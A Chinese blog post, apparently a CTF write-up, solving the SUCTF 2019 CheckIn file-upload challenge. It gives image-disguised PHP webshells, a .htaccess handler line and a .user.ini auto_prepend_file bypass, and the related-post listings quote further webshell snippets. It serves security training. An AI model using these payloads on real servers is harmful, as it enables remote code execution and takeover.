BUUCTF Web [SUCTF 2019]CheckIn1

最新推荐文章于 2024-02-01 15:31:42 发布
最新推荐文章于 2024-02-01 15:31:42 发布
阅读量372 收藏
点赞数
分类专栏: BUUCTF Web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126786413
版权

[SUCTF 2019]CheckIn1

启动靶机,直接尝试传木马

启用burp抓包,尝试改后缀jpg和content-type 

 提示我们上传的文件中含有非法字符<?

尝试一句话木马变形

<script language="php">@eval_r($_GET[b])</script>

看来还对文件头进行了检测 ,上传图片马

GIF89a?
<script language="pHp">eval($_REQUEST[1])</script>

上传成功 

此时访问上传jpg文件是无法解析我们的php代码的,需要再上传个.htaccess文件(前面也要加上文件头)

GIF89a?
AddType application/x-httpd-php .jpg

 

点击上传

 上传成功,访问一下.htaccess,神奇的是直接下载了一个index.htaccess文件,感觉是没戏了,抱着试一试的态度访问了一下图片马,果然,还是jpg无法解析。

既然不能通过.htaccess的方法解析图片马,那就搜一下大佬的wp,发现他们都用了.user.ini方法

GIF89a?
auto_prepend_file=tupianma.jpg

 

 

 上传成功,但图片马好像没了,还需要再传一次,上传成功,先访问一下index.php,蚁剑连接

 拿到flag            flag{0e59e145-2ce6-4d5f-939e-2aee06bbca57}

WmVicmE=
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 5960
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
checkin:会议签到 Web 应用程序
06-01
会议签到 Web 应用程序刷您的 ID 或输入您的信息以在任何会议上签到。依赖关系目前正在运行 , MySQL数据库Google Drive .NET SDK、Google Sheets .NET SDK、Google OAuth .NET SDK(用于 IEEECheckin.ASPDocs)版本...
[SUCTF 2019]CheckIn1
biggerpig的博客
09-29 1741
[SUCTF 2019]CheckIn1
[SUCTF 2019] Check In 1
c1516175954的博客
03-02 220
[SUCTF 2019]CheckIn1源码审计
[SUCTF 2019]CheckIn1-BUUCTF-xing
最新发布
chinese_cabbage0的博客
02-01 393
web安全
[SUCTF 2019]CheckIn 1
m0_73728268的博客
03-23 139
1.函数1exif_imagetype()函数 2.图片🐎的制作 3.user.ini配置文件
BUUCTF [SUCTF 2019]CheckIn 1
weixin_45642610的博客
01-17 673
BUUCTF [SUCTF 2019]CheckIn 1 文件包含,一句话木马上传。 直接上传一句话木马<?php eval($_POST['a']);?> 非法后缀 那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp 都试试,都不行。 这时候可以用图片上传。 在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入 GIF89a <script language=php>eval($_POST['a']);&l
checkin:SSM做的签到系统Web实现
04-29
SSM框架 实现简单的签到系统 sql 设计 create table user( user_id INT NOT NULL AUTO_INCREMENT, user_name VARCHAR(40) NOT NULL, user_email VARCHAR(100), user_password VARCHAR(100) NOT NULL, ...
checkin1:第5组TCSS 360
05-14
自述文件 TCSS 360第5组 小组成员: 哈里·库杜瓦(Hari G Kuduva) 邱天ice 拜萨尔贝克·乌鲁斯坦别科夫 香农·韦斯顿(Shannon Weston)
checkin
03-18
报到 此仓库包含为测试“深层链接”教程而开发的“酒店基本入住”网站应用程序。 部署方式 通过单击以下按钮之一,您可以轻松地免费将自己的Web应用程序版本免费部署到Heroku。 起动机 最终的
asp.net定位签到系统.rar
07-01
基于asp.net mvc的定位签到系统,后台使用layui,json格式数据传输,简单三层结构,后台可看到使用人员基本情况,出勤率,早退,迟到等数据。数据库,手机h5页面,后台齐全。...自己辛苦做的,请给好评,里面有基本注释...
glados_checkin
03-25
glados定时签到
checkin-system
05-19
1.安装node.js 安装并启动node.js。 ( ) $ node --version 安装并启动mongoDB。 ( ) $ cd mongodb $ mkdir -p data/db $ bin/mongod --dbpath data/db & 2.克隆gsshop-checkin $ git clone ...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
hence-flight-checkin
05-06
您必须先安装凉亭: npm install -g bower 然后,继续并方便地安装元素的依赖项: npm run install-deps可用的Gulp命令$ gulp将编译资产,通过实时重载为您的Web组件提供服务,转换es6,并在观察src文件的同时将js ...
BUUCTF——[SUCTF 2019]CheckIn 1
小白一枚多多关注的博客
04-12 1401
这道题应为我的理论限制,所以做了段时间才做出来,这道题它有两个知识前提,第一个就是.user.ini和图片文件头欺骗,这两点在这里有着举足轻重得作用,可以说不了解这两点就大概率得做不出这道题,前置知识点我也没咋理解好,但是这里有一篇写得不错得文章推荐给你门看看: .user.ini得作用以及配置 图片文件头欺骗 前置知识点知道后,那就开始进入环境并且解体了 进入环境后我们会看见一个文件上传得网页,当我一看到这个网页得时候我的第一想法就是文件上传漏洞,当然最后的实验结果也确实是这个漏洞,不过它这里用了一个p
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2111
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
web buuctf [SUCTF 2019]CheckIn1
weixin_44214568的博客
03-15 1483
如图,应该是一个文件上传的题目; 1.上传一句话木马: 上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤 改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤 2.改文件头GIF89a?<script language="php">eval($_post['a']);</script> 上传后提示 能够看到文件上传的路径,和文件所在位..
git checkin
05-12
你可能想问的是 git commit 命令,它用于将代码更改提交到本地 Git 仓库中。可以使用以下命令提交更改: ``` git add ....git commit -m "提交信息" # 提交更改并添加提交信息 ``` 请注意,在提交代码之前,您需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值